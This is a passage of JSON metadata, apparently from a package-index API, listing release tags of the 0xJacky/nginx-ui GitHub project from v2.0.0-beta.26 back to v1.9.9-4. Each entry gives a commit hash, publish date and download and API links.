934bbf4aa48","kind":"commit","published_at":"2024-07-21T07:46:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.26","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.26/manifests"},{"name":"v2.0.0-beta.25-patch.2","sha":"7a9aa3a33bc8be465032e541e965d62d7f6cec85","kind":"commit","published_at":"2024-07-20T01:46:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.25-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.25-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.25-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25-patch.2/manifests"},{"name":"v2.0.0-beta.25-patch.1","sha":"65befe282b04efb167aae6239f076ef6cf4583eb","kind":"commit","published_at":"2024-06-18T10:40:49.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.25-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.25-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.25-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25-patch.1/manifests"},{"name":"v2.0.0-beta.25","sha":"47d4013f3db807fabc8c8baad572d966d0b0bf6a","kind":"commit","published_at":"2024-06-18T09:53:07.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.25","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.25/manifests"},{"name":"v2.0.0-beta.24","sha":"0e3a824c119c79e49e9c97480d7f004379a91aad","kind":"commit","published_at":"2024-05-21T06:08:59.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.24","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.24/manifests"},{"name":"v2.0.0-beta.23-patch.2","sha":"931f7a87377cb6f42b06091c2fbcfcc46766b2f8","kind":"commit","published_at":"2024-05-08T11:00:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.23-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.23-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.23-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23-patch.2/manifests"},{"name":"v2.0.0-beta.23-patch.1","sha":"d6d7cdbb1fa1a0bc04578af63f6d19e9587c30ff","kind":"commit","published_at":"2024-05-08T09:27:42.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.23-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.23-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.23-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23-patch.1/manifests"},{"name":"v2.0.0-beta.23","sha":"392cac4186984297b6afc15087abfab813a747ce","kind":"commit","published_at":"2024-05-08T09:19:21.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.23","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.23/manifests"},{"name":"v2.0.0-beta.22","sha":"92fced15db22b1feebddee7718ce2bc6a5e63567","kind":"commit","published_at":"2024-05-04T04:28:06.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.22","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.22/manifests"},{"name":"v2.0.0-beta.21","sha":"660f11a50e0b616f8b1e98aa459fb7effb3cedda","kind":"commit","published_at":"2024-05-02T12:51:09.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.21","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.21/manifests"},{"name":"v2.0.0-beta.20","sha":"49a0c6fa8747bf5d9cf572be318d83552e4235bf","kind":"commit","published_at":"2024-05-02T05:44:34.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.20","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.20/manifests"},{"name":"v2.0.0-beta.19","sha":"cfa7629c3074a410c08936d55fa6d781d02ba183","kind":"commit","published_at":"2024-04-30T12:03:42.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.19","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.19/manifests"},{"name":"v2.0.0-beta.18-patch.2","sha":"979a1d5326b27924c3e6c5c5fae808394057c368","kind":"commit","published_at":"2024-03-14T14:49:34.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.18-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.18-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.18-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18-patch.2/manifests"},{"name":"v2.0.0-beta.18-patch.1","sha":"1577eb184d9ad8be65e61c42add544637355d053","kind":"commit","published_at":"2024-03-14T08:28:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.18-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.18-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.18-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18-patch.1/manifests"},{"name":"v2.0.0-beta.18","sha":"c8cd3e618695da7804e6273875e98f4502fe2025","kind":"commit","published_at":"2024-02-25T12:49:15.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.18","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.18/manifests"},{"name":"v2.0.0-beta.17","sha":"36e6ec555a8130cab8eb2845291358981767ab2d","kind":"commit","published_at":"2024-02-19T03:27:47.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.17","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.17/manifests"},{"name":"v2.0.0-beta.16","sha":"371adde8b6b2db472e8d4069af9ad59c4600a146","kind":"commit","published_at":"2024-02-14T09:40:56.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.16","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.16/manifests"},{"name":"v2.0.0-beta.15","sha":"f727218a28c167997e1478e82edb806f004792e7","kind":"commit","published_at":"2024-02-13T06:22:29.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.15","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.15/manifests"},{"name":"v2.0.0-beta.14","sha":"3bbe56cdc4e4f62720c249a62244f70736c2477a","kind":"commit","published_at":"2024-02-06T08:26:45.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.14","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.14/manifests"},{"name":"v2.0.0-beta.13-patch","sha":"da2c6d83d6c0e1be31ff436f3be8f4eeea2d10dc","kind":"commit","published_at":"2024-01-29T13:24:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.13-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.13-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.13-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.13-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.13-patch/manifests"},{"name":"v2.0.0-beta.13","sha":"db832d045be03c1c2cec43f98a2531874195fa96","kind":"commit","published_at":"2024-01-29T12:24:54.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.13","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.13/manifests"},{"name":"v2.0.0-beta.12","sha":"0381d2290cc3bf309cfb9745f2b930d603e219eb","kind":"commit","published_at":"2024-01-28T07:03:25.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.12","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.12/manifests"},{"name":"v2.0.0-beta.11","sha":"49f70bc9e94b46b0fa32c2c90efb1950966e72ab","kind":"commit","published_at":"2024-01-16T14:56:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.11","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.11/manifests"},{"name":"v2.0.0-beta.10-patch","sha":"79d0d37526ce47b19aa5aa7d9545989d38d05df3","kind":"commit","published_at":"2024-01-14T15:50:24.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.10-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.10-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.10-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.10-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.10-patch/manifests"},{"name":"v2.0.0-beta.10","sha":"e093d9276c2861c11b021b40dfcf856f7215d53d","kind":"commit","published_at":"2024-01-14T03:03:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.10","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.10/manifests"},{"name":"v2.0.0-beta.9","sha":"38c9727e154e3bffc652bfed8689ad7e2950848b","kind":"commit","published_at":"2023-12-20T01:22:50.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.9/manifests"},{"name":"v2.0.0-beta.8-patch","sha":"a63e85aa3700bd408d6e50c36a7e307d40db9442","kind":"commit","published_at":"2023-12-15T15:22:38.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.8-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.8-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.8-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.8-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.8-patch/manifests"},{"name":"v2.0.0-beta.8","sha":"dfee30e9d948711113c4bcfb2b6316fb37995543","kind":"commit","published_at":"2023-12-15T13:59:23.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.8/manifests"},{"name":"v2.0.0-beta.7","sha":"04bf8ec487f06ab17a9fb7f34a28766e5f53885e","kind":"commit","published_at":"2023-12-13T12:05:31.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.7/manifests"},{"name":"v2.0.0-beta.6-patch.2","sha":"33039f0195d21889d12ff54d6ea0fbdd2478c8c3","kind":"commit","published_at":"2023-12-10T03:16:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.6-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.6-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.6-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6-patch.2/manifests"},{"name":"v2.0.0-beta.6-patch","sha":"d4d5bd41c2cf780ca9eaf3908c3901fd2794fbeb","kind":"commit","published_at":"2023-12-08T00:58:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.6-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.6-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.6-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6-patch/manifests"},{"name":"v2.0.0-beta.6","sha":"0e28506bdd8e99215fc96b50cdb7aab2c1c25157","kind":"commit","published_at":"2023-12-06T14:59:20.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.6/manifests"},{"name":"v2.0.0-beta.5-patch","sha":"26788f301fa99627a42cc7dda1dd45f0e436c73d","kind":"commit","published_at":"2023-12-05T16:09:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.5-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.5-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.5-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.5-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.5-patch/manifests"},{"name":"v2.0.0-beta.5","sha":"f6712a80bba35c57bc78a0430b7425b7bd58574a","kind":"commit","published_at":"2023-12-05T06:38:07.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.5/manifests"},{"name":"v2.0.0-beta.4-patch","sha":"3ee8ef0523bf42d0486f52070a707900a915f8fc","kind":"commit","published_at":"2023-11-21T07:58:53.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.4-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.4-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.4-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.4-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.4-patch/manifests"},{"name":"v2.0.0-beta.4","sha":"4ec19c9cda3559b26ab164e34936b3646154ec1b","kind":"commit","published_at":"2023-11-10T13:37:59.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.4/manifests"},{"name":"v2.0.0-beta.3","sha":"de9bcff99b7a17082a821363d41f4a302820522d","kind":"commit","published_at":"2023-07-16T16:13:47.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.3/manifests"},{"name":"v2.0.0-beta.2","sha":"e1119f0e62e2b0fdab163c7f54c97366698a20a2","kind":"commit","published_at":"2023-05-31T01:41:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.2/manifests"},{"name":"v2.0.0-beta.1","sha":"6ce6d43916f0bcc9d9cc3a7a764c87bfcc0191b2","kind":"commit","published_at":"2023-05-24T01:41:21.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-beta.1/manifests"},{"name":"v1.9.9-4","sha":"cab5ff2c780b41fdaee7941faea03df1ca0351f6","kind":"commit","published_at":"2023-05-06T15:38:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.9.9-4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.9.9-4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.9.9-4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2F